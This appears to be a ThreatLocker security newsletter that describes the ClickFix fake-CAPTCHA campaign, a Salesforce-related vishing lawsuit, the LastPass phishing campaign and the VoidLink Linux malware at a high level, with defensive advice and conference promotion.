"Threats are always evolving, so a once-a-year audit is not sufficient. All systems should be undergoing regular penetration testing and improvement." - Danny Jenkins
What you need to know: ThreatLocker Threat Intelligence uncovered an active ClickFix social engineering campaign using a malicious site impersonating Booking[.]com to trick victims into executing harmful commands, ultimately leading to malware installation. Users trying to access travel info are redirected to a spoofed subdomain that mimics familiar CAPTCHA-style Cloudflare verification prompts. When the user clicks the checkbox, malicious commands are silently copied to their clipboard, and they are instructed to run them via Windows Run dialog.
Why it matters:In this instance, attackers are using a familiar verification check to exploit user trust. Instead of exploiting software vulnerabilities, this attack relies on convincing users to run malicious commands themselves, and instead of simple malware, it builds on a multi-stage execution with remote access. Because the malware is installed through legitimate tools like PowerShell, GitHub, and Node.js, it blends in with normal activity and can evade detection-focused defenses.
Key takeaways: Familiar interfaces and trusted brands are increasingly being weaponized for social engineering, and user-initiated execution is a critical blind spot for controls that rely on detection alone. Train employees to recognize fake subdomains, fake CAPTCHA, and fake verification screens. Restrict script execution that isn't explicitly approved, and limit approved applications to access only the files needed.
What you need to know: A new class action complaint, Morton v. Salesforce Inc. and TransUnion LLC, centers on a wave of 2025 social engineering attacks that allegedly used voice phishing to compromise Salesforce tenants and then pivot into other SaaS environments. The plaintiff’s theory portrays Salesforce as the “hub” that enabled downstream breaches, including a TransUnion incident in which attackers accessed the personal data of more than 4 million people through a third-party application. While the complaint frames these claims and attack techniques, many aspects remain unproven allegations rather than adjudicated facts.
Why it matters: This case highlights a broader security challenge for SaaS environments. Attackers are increasingly targeting human trust and legitimate workflows, like voice-led approvals and authorized integrations, to gain high-bandwidth access to sensitive data and lateral movement between cloud services. The complaint’s narrative underscores how a compromised SaaS access path can expose vast amounts of information and raise complex questions around platform liability, breach notification, and the adequacy of existing security controls.
Key takeaways: Security teams should reassess how SaaS permissions, integrations, and voice-based approvals are governed. Action items include enforcing least-privilege access for SaaS users and apps, reviewing and limiting third-party OAuth and API integrations, adding approval safeguards for high-risk actions, and treating SaaS-to-SaaS connections as untrusted by default.
What you need to know: Modern security operations teams must evolve beyond alert-driven monitoring and reactive incident response. As attack techniques increasingly rely on legitimate tools, trusted workflows, and user-initiated actions, traditional SOC models built around detection and triage struggle to keep up. The shift is toward prevention-first strategies, tighter alignment between security and IT operations, and tooling that reduces noise while enforcing policies by default.
Why it matters: Security teams are facing alert fatigue, staffing shortages, and increasingly stealthy attacks that don’t trigger obvious IoCs. When attackers operate inside “allowed” behaviors like approved apps, scripts, and SaaS tools, detection alone becomes unreliable and slow. A modern SecOps model prioritizes stopping unauthorized activity before it runs, reducing the burden on analysts, and shrinking dwell time rather than expecting teams to investigate their way out of every incident.
What you can do: Eliminate unnecessary execution paths, enforce least privilege across endpoints and SaaS platforms, and integrate security controls directly into operational workflows. Action items include reducing reliance on reactive alerts, standardizing allowlists for applications and scripts, improving collaboration between IT and security teams, and investing in controls that block unknown or unapproved activity by default.
What you need to know: Rather than triggering outages or ransomware alarms, attackers infiltrate environments, blend into legitimate activity, and steal data over time without raising suspicion. These “silent heists” are costly and persistent, with the average data breach costing more than $4.6 million and taking nearly nine months to identify and contain. AI-driven tools are accelerating this shift by enabling attackers to move faster, adapt in real time, and exploit trusted credentials, workflows, and LOTL techniques.
Why it matters: Exfiltration is harder to detect, often masked by legitimate tools and normal network behavior, and frequently paired with extortion or regulatory fallout long after the breach occurs. AI-enhanced phishing, credential abuse, and shadow AI tools further expand the attack surface, allowing both malicious actors and unwitting employees to expose sensitive data. By the time organizations realize data has been taken, the damage is already done.
What you can do: Reduce reliance on IoCs and focus on restricting what can run, connect, and exfiltrate data by default. Control what software and scripts can run with allowlisting, tighten credential and MFA enforcement across cloud and third-party platforms, monitor abnormal outbound connections, and limit the use of unapproved AI tools. Pairing default-deny controls with real-time behavioral monitoring and operational oversight helps shorten dwell time and stop quiet breaches before they turn into public crises.
Threats you need to know
Emerging threats abusing credentials, cloud, and “business-as-usual” workflows
What happened: A phishing campaign targeted LastPass users by impersonating backup or recovery-related requests, attempting to trick recipients into clicking malicious links and entering their credentials. The emails were framed as routine account or backup actions rather than urgent security alerts, making them less likely to arouse suspicion. Once credentials are harvested, attackers can gain access to password vaults, opening the door to downstream compromise.
Why it matters: Password managers are high-value targets because they often serve as a gateway to multiple internal systems, cloud platforms, and customer environments. A single successful credential theft can cascade into widespread access, lateral movement, and potential customer impact. This campaign reinforces that attackers are increasingly abusing “business-as-usual” workflows rather than overtly malicious prompts. If a privileged user or administrator is compromised, the blast radius can extend well beyond one account.
What you can do: Restrict access to vaults based on role and necessity and educate users to scrutinize operational emails.
AI-assisted Linux malware framework targets cloud infrastructure
What happened: Researchers uncovered a sophisticated new Linux malware framework called VoidLink that appears to have been built with significant assistance from AI, enabling rapid development of a feature-rich toolkit in record time. The framework is designed for long-term, stealthy access to Linux-based cloud and container environments and includes modular loaders, implants, rootkits, and more than 30 plug-ins that support reconnaissance, credential harvesting, lateral movement, and evasion. It can identify whether it’s running inside public cloud platforms such as AWS, Azure, or Google Cloud and adapt accordingly, making detection and removal more difficult.
Why it matters: VoidLink’s cloud-native design makes high-value Linux environments attractive targets. Its modular, adaptive behavior enables attackers to remain hidden for long periods, harvest critical credentials (including cloud), and customize attacks for each target environment. The use of AI to accelerate malware development also lowers the bar for sophisticated tooling, meaning more threat actors can potentially field advanced frameworks with less effort and cost than ever before.
What you can do: Enhance visibility into cloud and container workloads, extend threat detection and response to include runtime and API activity, and enforce least-privilege credentials and MFA across all cloud access points. Monitoring for anomalous lateral movement and unauthorized credential harvesting is essential. Finally, integrating real-time behavioral analytics, Zero Trust network segmentation, and incident response playbooks for cloud infrastructure helps prepare teams to detect and disrupt sophisticated, modular threats before they achieve persistence.
Detection alone isn’t enough, trust assumptions are breaking, and security leaders are being asked to move faster with fewer resources.
That’s why conversations at Zero Trust World 2026 are focused on how security, technology, and human decision-making must evolve together.
ZTW 26 keynote speakers:
Marcus Hutchins: Rethinking Cyber Defense in an Era of High Velocity Attacks
Jason Silva: Augmented Humanity
Linus + Luke: When Should Cybersecurity Become a Priority for Your Business?
NetApp: Securing Large Complex Organizations
David Spark, Michelle Wilson, & Rob Allen: CISO Series Podcast LIVE
Danny Jenkins & Rob Allen: Challenges Accepted Innovation Hour
P.S. The third issue of Cyber Hero Frontline will be released in March. To receive your copy, let us know your current address at the button above. You can also send a copy to a friend.
ThreatLocker, 1950 Summit Park Dr, Floor 4, Orlando, Florida 32810, United States
